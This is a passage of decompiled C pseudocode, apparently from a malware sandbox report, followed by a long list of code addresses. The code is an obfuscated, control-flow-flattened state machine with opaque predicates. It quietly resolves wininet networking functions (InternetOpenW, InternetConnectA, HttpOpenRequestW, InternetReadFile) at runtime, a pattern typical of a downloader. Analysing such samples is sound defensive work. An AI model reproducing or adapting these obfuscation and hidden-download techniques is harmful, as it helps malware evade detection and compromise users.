							_t895 =  &(_t895[1]);
							_t431 = 0xbb9baa2;
							if(_t885 < 0xeb) {
								_t431 = 0xed16d63d;
							}
							goto L370;
						} else {
							if(_t424 == 0x607634f4) {
								_v24 = ((_v24 << 0x11) + 0x1ea0000 >> 1) + 0xfffeec00;
								E0042CC81(((_v24 << 0x11) + 0x1ea0000 >> 1) + 0xfffeec00);
								_t895 =  &(_t895[1]);
								_v20 = 0x7f784f0e;
							}
							continue;
						}
					}
					if(_t424 <= 0x69f6e012) {
						if(_t424 == 0x64f01d14) {
							_t718 = _v28 * 0xef;
							_v28 = _t718 + 0x27;
							_t720 = 0xc9b0b0db;
							if(_t718 * _t718 != _t718 * _t718 * 0x858b - 1) {
								_t720 = 0xa4d9c1e6;
							}
							_v20 = _t720;
							_v136 = _v152;
							_v132 = _v148;
							_v128 = _v100;
							continue;
						}
						if(_t424 != 0x687cc179) {
							continue;
						}
						_t725 = (_v28 >> 0x0000000c & 0x0007ffff) + 0x3c;
						_v28 = (_t725 >> 0xb) * 0x190;
						_t778 = 0x22430df1;
						if(_t725 * _t725 != _t725 * _t725 * 0x84d1 - 1) {
							_t778 = 0x47940086;
						}
						goto L315;
					}
					if(_t424 == 0x69f6e013) {
						_v24 = _v24 << 0x1f;
						E00405CD8();
						E00405CD8();
						_v20 = 0xfe9e6b54;
						continue;
					}
					if(_t424 != 0x6c6c46b1) {
						if(_t424 != 0x6ad3e905) {
							continue;
						}
						return _v96;
					} else {
						_t883 = _v24 + 0x2f;
						_v24 = _t883 >> 2;
						E00405CD8();
						E0042C500(0x28f, _t883 >> 2);
						_t895 =  &(_t895[2]);
						_t431 = 0x5c91cd5d;
						if(_t883 < 0x198) {
							_t431 = 0xb1a2883d;
						}
						goto L370;
					}
					L11:
					if(_t424 > 0xbd7c45c0) {
						if(_t424 > 0xe1ac2d28) {
							if(_t424 > 0xf048c21c) {
								if(_t424 > 0xf8c2d8e2) {
									if(_t424 > 0xfa84a7cd) {
										if(_t424 == 0xfa84a7ce) {
											 *_v32(_v64);
											 *_v32(_v56);
											_v20 = 0xa9af0d;
											_v112 = 0;
											continue;
										}
										if(_t424 != 0xfacfb899) {
											continue;
										}
										_t753 = 0x7308 + _v24 * 0x3a3e4590;
										_v24 = _t753;
										_t429 = E00405CD8();
										_push(_t753);
										_push(0x60a);
										_push(0x61c8);
										E0041F840(_t429);
										_t895 =  &(_t895[3]);
										_t431 = 0xc9dd24ae;
										if(_t753 < 0x41) {
											_t431 = 0x81c33858;
										}
										goto L370;
									}
									if(_t424 == 0xf8c2d8e3) {
										 *_v32(_v56);
										_v20 = 0xadea3989;
									} else {
										if(_t424 == 0xf92e82de) {
											_v20 = 0x3e544020;
										}
									}
									continue;
								}
								if(_t424 > 0xf51b34bd) {
									if(_t424 == 0xf51b34be) {
										_v24 = _v24 * 0x2bc0000 >> 9;
										E0042D2D9();
										E0042D2D9();
										_v20 = 0xa50e5436;
										continue;
									}
									if(_t424 != 0xf68137be) {
										continue;
									}
									_t755 = 0xfffff1de + _v24 * 0x43;
									_v24 = _t755 >> 0xd;
									E0042C500(0x3580, _t755 >> 0xd);
									_t895 =  &(_t895[2]);
									_t431 = 0x374609b9;
									if(_t755 < 0x1e2000) {
										_t431 = 0x3da30a9b;
									}
									goto L370;
								} else {
									if(_t424 == 0xf048c21d) {
										 *_v32(_v40);
										_v20 = 0xed55ca1c;
									} else {
										if(_t424 == 0xf17d0de4) {
											_v20 = 0xfe9e6b54;
										}
									}
									continue;
								}
							}
							if(_t424 > 0xe5de47a8) {
								if(_t424 > 0xed16d63c) {
									if(_t424 == 0xed16d63d) {
										 *_v36 = 0;
										_v20 = 0x16f14fb;
									} else {
										if(_t424 == 0xed55ca1c) {
											 *_v32(_v64);
											 *_v32(_v56);
											_v20 = 0xe43a8fa7;
										}
									}
								} else {
									if(_t424 == 0xe5de47a9) {
										_v28 = (0xacc2 + (_v28 >> 0x00000003 & 0x0fffffff) * 0xea >> 6) + 0xffffffbc;
										_v20 = 0x3e71f9d2;
									} else {
										if(_t424 == 0xe9b512d0) {
											_v24 = 0x3a25 + (_v24 >> 0x1e) * 0x348f;
											_v20 = 0xbd00218a;
										}
									}
								}
							} else {
								if(_t424 > 0xe43a8fa6) {
									if(_t424 == 0xe43a8fa7) {
										_t461 = 0xffff7090 + _v28 * 0xd8;
										_v28 = (_t461 >> 0x10) + 0xffffffbf >> 3;
										_t465 = 0xa50e5436;
										if((_t461 >> 5) * (_t461 >> 5) * 0x407f - 1 != (_t461 >> 5) * (_t461 >> 5)) {
											_t465 = 0xe4fd0a02;
										}
										_v20 = _t465;
										_v116 = 0;
									} else {
										if(_t424 == 0xe4fd0a02) {
											_v20 = 0xa9af0d;
											_v112 = _v116;
										}
									}
								} else {
									if(_t424 == 0xe1ac2d29) {
										_v20 = 0xcca7c3ca;
									} else {
										if(_t424 == 0xe3ac16f4) {
											_v148 = _v196 + _v104;
											_v20 = 0x94b6e091;
										}
									}
								}
							}
							continue;
						}
						if(_t424 > 0xccb77d4b) {
							if(_t424 > 0xd8ace255) {
								if(_t424 > 0xde09edc5) {
									if(_t424 == 0xde09edc6) {
										_v196 =  *_v60;
										_v20 = 0xe3ac16f4;
										continue;
									}
									if(_t424 != 0xdf21f8cd) {
										continue;
									}
									_t473 = _v28;
									_v28 = _t473 + 0xfffffe38;
									_t431 = 0x30f3330a;
									if((_t473 - 0x142) * (_t473 - 0x142) != (_t473 - 0x142) * (_t473 - 0x142) * 0x807b - 1) {
										_t431 = 0x97fe1ba4;
									}
									goto L370;
								}
								if(_t424 == 0xd8ace256) {
									_t892 = _v24 * 0x7c800;
									_v24 = _t892;
									E0042CC81(_t892);
									_t895 =  &(_t895[1]);
									_t431 = 0xa88a8b75;
									if(_t892 != 0) {
										_t431 = 0xbd00218a;
									}
									goto L370;
								} else {
									if(_t424 == 0xd9c9c091) {
										_v20 = 0x7c305ddd;
									}
									continue;
								}
							}
							if(_t424 > 0xd255b3a7) {
								if(_t424 == 0xd255b3a8) {
									_t817 = 0x6d53df8 + _v24 * 0x17418000;
									_v24 = _t817;
									_t431 = 0xe9b512d0;
									if(_t817 < 0x32) {
										L361:
										_t431 = 0xa50e5436;
										goto L370;
									}
									goto L370;
								}
								if(_t424 == 0xd3f69e99) {
									_v20 = 0x592b6a8c;
								}
								continue;
							}
							if(_t424 == 0xccb77d4c) {
								_t758 = _v24 * 0x00051000 >> 0x00000004 | 0x00000052;
								_v24 = _t758;
								E0042CC81(_t758);
								E0042CC81(_t758);
								_t895 =  &(_t895[2]);
								_t431 = 0xcca7c3ca;
								if(_t758 >= 0xa0) {
									_t431 = 0x29fd9ac8;
								}
								goto L370;
							}
							if(_t424 != 0xce77b803) {
								continue;
							} else {
								_t760 = _v24 + 0xffffffbb;
								_v24 = _t760;
								E00405CD8();
								E0042C500(_t760, 0x29a8);
								_t895 =  &(_t895[2]);
								_t431 = 0x374609b9;
								if(_t760 >= 0x95) {
									_t431 = 0xb2ba095e;
								}
								goto L370;
							}
						}
						if(_t424 > 0xc6225da2) {
							if(_t424 > 0xc9dd24ad) {
								if(_t424 == 0xc9dd24ae) {
									_t482 = InternetOpenW(0, 0, 0, 0, 0); // executed
									_v56 = _t482;
									_t431 = 0x5c51fc7e;
									if(_v56 != 0) {
										_t431 = 0xeccad34;
									}
									goto L370;
								}
								if(_t424 == 0xcca7c3ca) {
									E004338A0(_v68, "InternetConnectA", 0x11);
									_t895 =  &(_t895[3]);
									_v20 = 0x75badd0d;
								}
							} else {
								if(_t424 == 0xc6225da3) {
									_t761 = _v24 * 0x820;
									_v24 = _t761;
									_t484 = E0042CC81(_t761);
									_push(0x21eb);
									_push(0x5fe0);
									_push(_t761);
									E0041F840(_t484);
									_t895 =  &(_t895[4]);
									_v20 = 0x81c33858;
								} else {
									if(_t424 == 0xc9b0b0db) {
										_v160 = GetModuleHandleW( &_v270);
										_v20 = 0x6310c7aa;
									}
								}
							}
							continue;
						}
						if(_t424 > 0xc0873019) {
							if(_t424 == 0xc087301a) {
								_t820 = (_v24 & 0x03ffffff) + (_v24 & 0x03ffffff) + 1;
								_v24 = _t820;
								_t431 = 0xc9b0b0db;
								if(_t820 >= 0xf9) {
									_t431 = 0x5d4ae4e1;
								}
								goto L370;
							}
							if(_t424 != 0xc222e75c) {
								continue;
							}
							_t763 = 0x6f9100cc + (_v24 >> 3) * 0x4b0000;
							_v24 = _t763;
							E0042CC81(_t763);
							E0042CC81(_t763);
							_t895 =  &(_t895[2]);
							_t431 = 0x5c91cd5d;
							if(_t763 >= 0x76) {
								goto L223;
							}
							goto L370;
						} else {
							if(_t424 == 0xbd7c45c1) {
								_v20 = 0x374609b9;
							} else {
								if(_t424 == 0xbfa7dd68) {
									_v24 = (_v24 >> 4) + 0xdb;
									E00405CD8();
									_v20 = 0xb3290edb;
								}
							}
							continue;
						}
					}
					if(_t424 > 0xa50e5435) {
						if(_t424 > 0xb1c14800) {
							if(_t424 > 0xb41ac1e5) {
								if(_t424 > 0xbba1eda1) {
									if(_t424 == 0xbba1eda2) {
										_v20 = 0x1b7e23f8;
									} else {
										if(_t424 == 0xbd00218a) {
											_v164 = GetProcAddress(_v160,  &_v228);
											_v20 = 0x15e709b8;
										}
									}
									continue;
								}
								if(_t424 == 0xb41ac1e6) {
									_v24 = _v24 + 0xa6;
									E00405CD8();
									_v20 = 0xa278f3a9;
									continue;
								}
								if(_t424 != 0xba0b3285) {
									continue;
								} else {
									_v28 = 0;
									_t431 = 0x6d2e668d;
									if((_v28 + 0xc4 >> 0xd) * (_v28 + 0xc4 >> 0xd) * 0x71d7 - 1 != (_v28 + 0xc4 >> 0xd) * (_v28 + 0xc4 >> 0xd)) {
										_t431 = 0x20450f8d;
									}
									goto L370;
								}
							}
							if(_t424 > 0xb2ba095d) {
								if(_t424 == 0xb2ba095e) {
									_v41 = _v188 != 0;
									_v20 = 0x22430df1;
									continue;
								}
								if(_t424 != 0xb3290edb) {
									continue;
								}
								_t826 = 0xffffff2f + _v24 * 0xb3;
								_v24 = (_t826 >> 0xc) + 0xe3 >> 7;
								_t431 = 0xfc3115d;
								if(_t826 >= 0x3b9d000) {
									_t431 = 0x69f6e013;
								}
								goto L370;
							}
							if(_t424 == 0xb1c14801) {
								_v28 = _v28 << 0x0000000a & 0x07fffc00 | 0x000000c5;
								_v20 = 0xa4d9c1e6;
								_v136 = _v144;
								_v132 = 0;
								_v128 = _v140;
								continue;
							}
							if(_t424 == 0xb24e6ef6) {
								_t515 = (_v28 + 0xffffffc8 >> 0xd) + 0xa;
								_v28 = _t515 << 0x14;
								_t517 = 0x1f81ca69;
								if(_t515 * _t515 * 0x7429 - 1 != _t515 * _t515) {
									_t517 = 0xebea009;
								}
								L111:
								_v20 = _t517;
							}
							continue;
						}
						if(_t424 > 0xa9c50647) {
							if(_t424 > 0xadea3988) {
								if(_t424 == 0xadea3989) {
									_v28 = _v28 >> 0x0000000a & 0x0003ffff;
									_v20 = 0xa88a8b75;
								} else {
									if(_t424 == 0xb1a2883d) {
										_t524 = (_v24 >> 0xb) + (_v24 >> 0xb) + 0x159;
										_v24 = _t524;
										_push(0x547a);
										_push(_t524);
										_push(0x4546);
										E0041F840(_t524);
										_t895 =  &(_t895[3]);
										E00405CD8();
										_v20 = 0x9079e06b;
									}
								}
								continue;
							}
							if(_t424 == 0xa9c50648) {
								_v28 = 0x5716 + _v28 * 0x9952;
								_v20 = 0xbd7c45c1;
								continue;
							}
							if(_t424 != 0xac5c7333) {
								continue;
							} else {
								_t765 = 0xffffb3f2 + _v24 * 0xb1;
								_v24 = _t765;
								E0042D2D9();
								_t431 = 0xc9b0b0db;
								if(_t765 < 0xe2) {
									_t431 = 0x2a00a18a;
								}
								goto L370;
							}
						}
						if(_t424 > 0xa69bcb1e) {
							if(_t424 == 0xa69bcb1f) {
								_v24 = (_v24 << 0xb) + 0x73000;
								_v20 = 0xa1e89606;
							} else {
								if(_t424 == 0xa88a8b75) {
									_t533 = E0042CC81(_v108); // executed
									_t895 =  &(_t895[1]);
									_v204 = _t533;
									_v20 = 0xdf21f8cd;
								}
							}
							continue;
						}
						if(_t424 == 0xa50e5436) {
							E004338A0(_v72, "InternetCloseHandle", 0x14);
							_v32 = GetProcAddress(_v52, _v72);
							E004338A0(_v76, "HttpOpenRequestW", 0x11);
							_t895 =  &(_t895[6]);
							_v176 = GetProcAddress(_v52, _v76);
							_v20 = 0xb24e6ef6;
							continue;
						}
						if(_t424 != 0xa5fd90c0) {
							continue;
						} else {
							_t830 = _v28;
							_v28 = (0xfffad800 + _t830 * 0xf00 >> 0xc) + 0xffffff0f;
							_t778 = 0x81c33858;
							if((_t830 - 0x22) * (_t830 - 0x22) * 0xa3 - 1 != (_t830 - 0x22) * (_t830 - 0x22)) {
								_t778 = 0xde09edc6;
							}
							goto L315;
						}
					}
					if(_t424 > 0x94b6e090) {
						if(_t424 > 0xa074f80c) {
							if(_t424 > 0xa278f3a8) {
								if(_t424 == 0xa278f3a9) {
									_push(_t424);
									_t901 = _t895 - 0x10;
									_v68 = _t901;
									_t902 = _t901 - 0x14;
									_v72 = _t902;
									_t903 = _t902 - 0x14;
									_v76 = _t903;
									_t904 = _t903 - 0x14;
									_v80 = _t904;
									_t905 = _t904 - 0x14;
									_v84 = _t905;
									_t906 = _t905 - 0x10;
									_v88 = _t906;
									_t907 = _t906 - 0x400;
									_v48 = _t907;
									_t895 = _t907 - 0x14;
									_t548 = _t895;
									_v92 = _t548;
									_push(_t548);
									_t549 = _t895;
									_v36 = _t549;
									_push(_t549);
									_v60 = _t895;
									_v20 = 0xa9c50648;
								} else {
									if(_t424 == 0xa4d9c1e6) {
										_v208 = _v128;
										_v104 = _v132;
										_v156 = _v136;
										_v20 = 0x7cc50aaa;
									}
								}
								continue;
							}
							if(_t424 == 0xa074f80d) {
								_t556 = _v28 + 0xffffffaa >> 0xd;
								_v28 = _t556 + 0xffffffde;
								_t431 = 0xc6225da3;
								if(_t556 * _t556 * 0x4fdd - 1 != _t556 * _t556) {
									_t431 = 0x77bf5f57;
								}
								goto L370;
							}
							if(_t424 != 0xa1e89606) {
								continue;
							}
							_t839 = (_v24 >> 4) + 0xffffffbb;
							_v24 = _t839 >> 1;
							_t431 = 0xcca7c3ca;
							if(_t839 < 0x6c) {
								goto L329;
							} else {
								goto L370;
							}
						}
						if(_t424 > 0x9c31a221) {
							if(_t424 == 0x9c31a222) {
								_t894 =  &_v294;
								E004338A0(_t894, L"wininet.dll", 0x18);
								_t895 =  &(_t895[3]);
								_v52 =  *_v164(_t894);
								_v232 = 0x57;
								_v236 = 0x6e65704f;
								_v240 = 0x74656e72;
								_v244 = 0x65746e49;
								_t336 =  &_v244; // 0x65746e49
								_v168 = GetProcAddress(_v52, _t336);
								_v20 = 0xe1ac2d29;
							} else {
								if(_t424 == 0x9ca64f4e) {
									_v28 = _v28 << 0x0000001d | 0x0006b3d4;
									_v20 = 0xed16d63d;
								}
							}
							continue;
						}
						if(_t424 == 0x94b6e091) {
							_t568 = _v28;
							_v28 = _t568 + 0x124 >> 4;
							_t431 = 0xe3ac16f4;
							if((_t568 - 0x7d) * (_t568 - 0x7d) * 0x7723 - 1 != (_t568 - 0x7d) * (_t568 - 0x7d)) {
								_t431 = 0x7f784f0e;
							}
							goto L370;
						} else {
							if(_t424 == 0x97fe1ba4) {
								E0043F602(_v108);
								_t895 =  &(_t895[1]);
								_v20 = 0xe4fd0a02;
								_v116 = _v204;
							}
							continue;
						}
					}
					if(_t424 > 0x8ba133ca) {
						if(_t424 > 0x9079e06a) {
							if(_t424 == 0x9079e06b) {
								_t843 = 0x4c + (_v24 >> 9) * 0x158;
								_v24 = _t843;
								_t431 = 0x75badd0d;
								if(_t843 >= 0xc) {
									goto L370;
								}
								goto L361;
							}
							if(_t424 == 0x9409d7b6) {
								_v20 = 0xfb4ef30c;
							}
							continue;
						}
						if(_t424 == 0x8ba133cb) {
							E004338A0(_v84, "InternetReadFile", 0x11);
							_t895 =  &(_t895[3]);
							GetProcAddress(_v52, _v84);
							_v20 = 0x4b1c6c50;
							continue;
						}
						if(_t424 != 0x8fec2d08) {
							continue;
						} else {
							_t579 = _v28 >> 2;
							_v28 = 0x74e8 + _t579 * 0xac;
							_t517 = 0x2a071572;
							if((_t579 - 0x29) * (_t579 - 0x29) * 0x1b4d - 1 != (_t579 - 0x29) * (_t579 - 0x29)) {
								_t517 = 0xbd00218a;
							}
							goto L111;
						}
					} else {
						if(_t424 > 0x8342755d) {
							if(_t424 == 0x8342755e) {
								_v42 = _v200 != 0;
								_v152 =  *_v36;
								_v20 = 0x687cc179;
							} else {
								if(_t424 == 0x8ac696a0) {
									_v192 = _v100 + _v104;
									_v20 = 0x12b6d71;
								}
							}
						} else {
							if(_t424 == 0x807bf9f2) {
								_v20 = 0x33020bbf;
							} else {
								if(_t424 == 0x81c33858) {
									_v180 = GetProcAddress(_v52, _v80);
									_v20 = 0xd4731c8;
								}
							}
						}
						continue;
					}
				}
			}

0x0042d2e5
0x0042d2ee
0x0042d2ee
0x0042d2f6
0x00000000
0x00000000
0x0042d2fc
0x0042d301
0x0042d3f5
0x0042d588
0x0042d841
0x0042dcc6
0x0042e470
0x0042ee48
0x0042ee4d
0x0042ee50
0x0042e476
0x0042e47b
0x0042e48b
0x0042e490
0x0042e493
0x0042e493
0x0042e47b
0x0042dccc
0x0042dcd1
0x0042e95d
0x0042dcd7
0x0042dcdc
0x0042dcf0
0x0042dcf6
0x0042dcf6
0x0042dcdc
0x0042dcd1
0x0042d2ee
0x0042d2ee
0x0042d2f6
0x00000000
0x00000000
0x00000000
0x0042d2f6
0x0042d2ee
0x0042d84c
0x0042e0b2
0x0042ebff
0x0042ec01
0x0042ec01
0x0042ec08
0x0042d2ee
0x0042d2ee
0x0042d2f6
0x00000000
0x00000000
0x00000000
0x0042d2f6
0x00000000
0x0042d2ee
0x0042e0bd
0x00000000
0x00000000
0x0042e0c9
0x0042e0cf
0x0042e0d2
0x0042e0d7
0x0042e0dc
0x0042e0e7
0x0042e0ed
0x0042e0ed
0x0042ed33
0x0042ed33
0x00000000
0x0042ed33
0x0042d857
0x0042e708
0x0042e70e
0x0042e712
0x0042e717
0x0042e71a
0x0042e71f
0x0042e727
0x0042e72d
0x0042e72d
0x00000000
0x0042d85d
0x0042d862
0x0042d868
0x0042d86f
0x0042d879
0x0042d883
0x0042d88d
0x0042d88d
0x00000000
0x0042d862
0x0042d857
0x0042d593
0x0042daa8
0x0042e2b2
0x0042ed1f
0x0042ed21
0x0042ed24
0x0042ed2c
0x0042ed2e
0x0042ed2e
0x00000000
0x0042ed2c
0x0042e2bd
0x00000000
0x00000000
0x0042e2d4
0x0042e2d7
0x0042e2dc
0x0042e2dc
0x00000000
0x0042e2dc
0x0042dab3
0x0042e845
0x0042e84d
0x0042e84f
0x00000000
0x0042e84f
0x0042dabe
0x00000000
0x0042dac4
0x0042dac9
0x0042dad6
0x0042dadb
0x0042dadd
0x0042dadd
0x0042dae6
0x0042daec
0x0042daec
0x00000000
0x0042dae6
0x0042dabe
0x0042d59e
0x0042deaa
0x0042ea8e
0x0042ea91
0x0042ea94
0x0042ea9a
0x0042ea9f
0x0042eaa2
0x0042eaaa
0x0042eab0
0x0042eab0
0x00000000
0x0042eaaa
0x0042deb5
0x0042debe
0x0042dec7
0x0042deca
0x0042deca
0x00000000
0x0042deb5
0x0042d5a9
0x0042e5c6
0x0042e5cf
0x0042e5d4
0x0042e5d7
0x0042e5dc
0x00000000
0x0042e5dc
0x0042d5b4
0x00000000
0x0042d5ba
0x0042d5c1
0x0042d5c4
0x0042d5c8
0x0042d5cd
0x0042d5d0
0x0042d5d5
0x0042d5e0
0x0042d5e6
0x0042d5e6
0x00000000
0x0042d5e0
0x0042d5b4
0x0042d400
0x0042d701
0x0042dbad
0x0042e392
0x0042ede9
0x0042edec
0x0042e398
0x0042e39d
0x0042e3a3
0x0042e3a3
0x0042e39d
0x00000000
0x0042e392
0x0042dbb8
0x00000000
0x0042dbbe
0x0042dbc3
0x0042dbd3
0x0042dbd8
0x0042dbdb
0x0042dbdb
0x00000000
0x0042dbc3
0x0042dbb8
0x0042d70c
0x0042dfa4
0x0042eb91
0x0042eb94
0x00000000
0x0042eb94
0x0042dfaf
0x00000000
0x00000000
0x0042dfbb
0x0042dfc1
0x0042dfc4
0x0042dfc9
0x0042dfce
0x0042dfd9
0x0042dfdf
0x0042dfdf
0x00000000
0x0042d712
0x0042d717
0x0042e664
0x0042d71d
0x0042d722
0x0042d72b
0x0042d72b
0x0042d722
0x00000000
0x0042d717
0x0042d70c
0x0042d40b
0x0042d97c
0x0042e1a9
0x0042ec86
0x0042ec8b
0x0042ec8e
0x00000000
0x0042ec8e
0x0042e1b4
0x00000000
0x00000000
0x0042e1ba
0x0042e1c1
0x0042e1c5
0x0042e1ca
0x0042e1cd
0x0042e1d4
0x0042e1da
0x0042e1da
0x00000000
0x0042e1d4
0x0042d987
0x0042e7ab
0x0042e7c4
0x0042e7c7
0x0042e7ce
0x0042e7d0
0x0042e7d0
0x0042e7d5
0x0042e7d5
0x0042d98d
0x0042d992
0x0042d9aa
0x0042d9b0
0x0042d9b0
0x0042d992
0x00000000
0x0042d987
0x0042d416
0x0042ddb5
0x0042e9ef
0x0042e9f6
0x00000000
0x0042e9f6
0x0042ddc0
0x00000000
0x00000000
0x0042ddc9
0x0042dddb
0x0042ddde
0x0042dde5
0x0042ddeb
0x0042ddeb
0x00000000
0x0042dde5
0x0042d421
0x0042e531
0x0042e533
0x0042e536
0x0042e53e
0x0042e544
0x0042e544
0x00000000
0x0042d427
0x0042d42c
0x0042d432
0x0042d43c
0x0042d440
0x0042d446
0x0042d449
0x0042d44f
0x0042d452
0x0042d458
0x0042d45a
0x0042d45a
0x00000000
0x0042d42c
0x0042d421
0x0042d30c
0x0042d4cc
0x0042d79f
0x0042dc1c
0x0042e3fc
0x0042ee1c
0x0042ee1f
0x0042e402
0x0042e407
0x0042e421
0x0042e424
0x0042e424
0x0042e407
0x00000000
0x0042e3fc
0x0042dc27
0x0042e924
0x0042e92a
0x0042e92d
0x0042e935
0x00000000
0x00000000
0x0042e93b
0x0042e93b
0x00000000
0x0042e93b
0x0042dc32
0x00000000
0x0042dc38
0x0042dc40
0x0042dc51
0x0042dc54
0x0042dc5b
0x0042dc61
0x0042dc61
0x00000000
0x0042dc5b
0x0042dc32
0x0042d7aa
0x0042e010
0x0042ebc3
0x0042ebc5
0x0042ebca
0x0042ebcd
0x0042ebd6
0x00000000
0x0042ebd6
0x0042e01b
0x00000000
0x00000000
0x0042e030
0x0042e036
0x0042e039
0x0042e03f
0x0042e044
0x0042e047
0x0042e04f
0x00000000
0x00000000
0x0042e055
0x0042e055
0x00000000
0x0042e055
0x0042d7b5
0x0042e6b6
0x0042e6ba
0x00000000
0x0042e6ba
0x0042d7c0
0x00000000
0x0042d7c6
0x0042d7d3
0x00000000
0x0042d7d3
0x0042d7c0
0x0042d4d7
0x0042da01
0x0042e21d
0x0042ecc1
0x0042ecc7
0x0042ecca
0x0042eccb
0x0042ecd0
0x0042ecd5
0x0042ecda
0x0042ecdd
0x0042ece5
0x0042ece7
0x0042ece7
0x00000000
0x0042ece5
0x0042e228
0x00000000
0x00000000
0x0042e22e
0x0042e249
0x0042e24c
0x0042e253
0x0042e259
0x0042e259
0x00000000
0x0042da07
0x0042da0c
0x0042e812
0x0042e818
0x0042da12
0x0042da17
0x0042da24
0x0042da29
0x0042da2b
0x0042da2b
0x0042da34
0x0042da36
0x0042da36
0x0042da3b
0x0042da47
0x0042da4a
0x0042da4a
0x0042da17
0x00000000
0x0042da0c
0x0042d4dd
0x0042d4e2
0x0042de4a
0x0042ea2a
0x0042ea45
0x0042ea48
0x0042ea4f
0x0042ea51
0x0042ea51
0x0042ea56
0x0042ea5f
0x0042ea62
0x0042de50
0x0042de55
0x0042de5b
0x0042de60
0x0042de66
0x0042de66
0x0042de55
0x0042d4e8
0x0042d4ed
0x0042e55a
0x0042d4f3
0x0042d4f8
0x0042d501
0x0042d501
0x0042d4f8
0x0042d4ed
0x00000000
0x0042d4e2
0x0042d4d7
0x0042d317
0x0042d64a
0x0042db3c
0x0042e31f
0x0042ed5c
0x0042ed5d
0x0042ed63
0x0042ed68
0x0042ed6b
0x0042ed71
0x0042e325
0x0042e32a
0x0042e338
0x0042e33e
0x0042e344
0x0042e344
0x0042e32a
0x00000000
0x0042e31f
0x0042db47
0x0042e892
0x0042e8a9
0x0042e8ac
0x0042e8b3
0x0042e8b5
0x0042e8b5
0x0042e8ba
0x0042e8ba
0x0042db4d
0x0042db52
0x0042db58
0x0042db58
0x0042db52
0x00000000
0x0042db47
0x0042d655
0x0042df09
0x0042eb0a
0x0042eb10
0x00000000
0x0042eb10
0x0042df14
0x00000000
0x00000000
0x0042df1a
0x0042df2f
0x0042df3a
0x0042df3f
0x0042df56
0x0042df58
0x0042df5f
0x0042df65
0x0042df65
0x00000000
0x0042df5f
0x0042d660
0x0042e5fd
0x0042e603
0x0042e60c
0x0042e611
0x0042e614
0x0042e61f
0x0042e625
0x0042e625
0x00000000
0x0042e61f
0x0042d66b
0x00000000
0x0042d671
0x0042d671
0x0042d693
0x0042d696
0x0042d69d
0x0042d6a3
0x0042d6a3
0x00000000
0x0042d69d
0x0042d66b
0x0042d322
0x0042d8d9
0x0042e14d
0x0042ec43
0x0042ec46
0x0042e153
0x0042e158
0x0042e173
0x0042e176
0x0042e176
0x0042e158
0x00000000
0x0042e14d
0x0042d8e4
0x0042e74f
0x0042e752
0x0042e755
0x0042e75b
0x0042e760
0x0042e763
0x0042e76e
0x0042e774
0x0042e774
0x00000000
0x0042d8ea
0x0042d8ef
0x0042d907
0x0042d90b
0x0042d910
0x0042d913
0x0042d913
0x00000000
0x0042d8ef
0x0042d8e4
0x0042d32d
0x0042dd34
0x0042e97d
0x0042e993
0x0042e996
0x0042e99d
0x0042e99f
0x0042e99f
0x0042e9a4
0x0042e9b6
0x0042e9bc
0x0042e9bf
0x00000000
0x0042e9bf
0x0042dd3f
0x00000000
0x00000000
0x0042dd50
0x0042dd68
0x0042dd6b
0x0042dd72
0x0042dd78
0x0042dd78
0x00000000
0x0042dd72
0x0042d338
0x0042e4f5
0x0042e4f9
0x0042e4fe
0x0042e503
0x00000000
0x0042e503
0x0042d343
0x0042ee84
0x00000000
0x00000000
0x0042eea3
0x0042d349
0x0042d34c
0x0042d354
0x0042d357
0x0042d362
0x0042d367
0x0042d36a
0x0042d375
0x0042d37b
0x0042d37b
0x00000000
0x0042d375
0x0042d385
0x0042d38a
0x0042d46b
0x0042d5f5
0x0042d89e
0x0042dd07
0x0042e4a4
0x0042ee62
0x0042ee6a
0x0042ee6c
0x0042ee73
0x00000000
0x0042ee73
0x0042e4af
0x00000000
0x00000000
0x0042e4bc
0x0042e4c2
0x0042e4c5
0x0042e4ca
0x0042e4cb
0x0042e4d0
0x0042e4d5
0x0042e4da
0x0042e4dd
0x0042e4e5
0x0042e4eb
0x0042e4eb
0x00000000
0x0042e4e5
0x0042dd12
0x0042e96f
0x0042e971
0x0042dd18
0x0042dd1d
0x0042dd23
0x0042dd23
0x0042dd1d
0x00000000
0x0042dd12
0x0042d8a9
0x0042e0fc
0x0042ec1e
0x0042ec21
0x0042ec26
0x0042ec2b
0x00000000
0x0042ec2b
0x0042e107
0x00000000
0x00000000
0x0042e111
0x0042e11c
0x0042e125
0x0042e12a
0x0042e12d
0x0042e138
0x0042e13e
0x0042e13e
0x00000000
0x0042d8af
0x0042d8b4
0x0042e73d
0x0042e73f
0x0042d8ba
0x0042d8bf
0x0042d8c8
0x0042d8c8
0x0042d8bf
0x00000000
0x0042d8b4
0x0042d8a9
0x0042d600
0x0042dafb
0x0042e2ed
0x0042ed3e
0x0042ed44
0x0042e2f3
0x0042e2f8
0x0042e304
0x0042e30c
0x0042e30e
0x0042e30e
0x0042e2f8
0x0042db01
0x0042db06
0x0042e877
0x0042e87a
0x0042db0c
0x0042db11
0x0042db28
0x0042db2b
0x0042db2b
0x0042db11
0x0042db06
0x0042d606
0x0042d60b
0x0042dedb
0x0042eac1
0x0042eade
0x0042eae1
0x0042eae8
0x0042eaea
0x0042eaea
0x0042eaef
0x0042eaf2
0x0042dee1
0x0042dee6
0x0042def5
0x0042defc
0x0042defc
0x0042dee6
0x0042d611
0x0042d616
0x0042e5eb
0x0042d61c
0x0042d621
0x0042d630
0x0042d639
0x0042d639
0x0042d621
0x0042d616
0x0042d60b
0x00000000
0x0042d600
0x0042d476
0x0042d73c
0x0042dbec
0x0042e3b4
0x0042edfd
0x0042ee03
0x00000000
0x0042ee03
0x0042e3bf
0x00000000
0x00000000
0x0042e3c5
0x0042e3dd
0x0042e3e0
0x0042e3e7
0x0042e3ed
0x0042e3ed
0x00000000
0x0042e3e7
0x0042dbf7
0x0042e8f4
0x0042e8fb
0x0042e8ff
0x0042e904
0x0042e907
0x0042e90e
0x0042e914
0x0042e914
0x00000000
0x0042dbfd
0x0042dc02
0x0042dc0b
0x0042dc0b
0x00000000
0x0042dc02
0x0042dbf7
0x0042d747
0x0042dfee
0x0042eba7
0x0042ebad
0x0042ebb0
0x0042ebb8
0x0042ec72
0x0042ec72
0x00000000
0x0042ec72
0x00000000
0x0042ebbe
0x0042dff9
0x0042dfff
0x0042dfff
0x00000000
0x0042dff9
0x0042d752
0x0042e67a
0x0042e67d
0x0042e681
0x0042e68a
0x0042e68f
0x0042e692
0x0042e69d
0x0042e6a3
0x0042e6a3
0x00000000
0x0042e69d
0x0042d75d
0x00000000
0x0042d763
0x0042d766
0x0042d769
0x0042d76c
0x0042d777
0x0042d77c
0x0042d77f
0x0042d78a
0x0042d790
0x0042d790
0x00000000
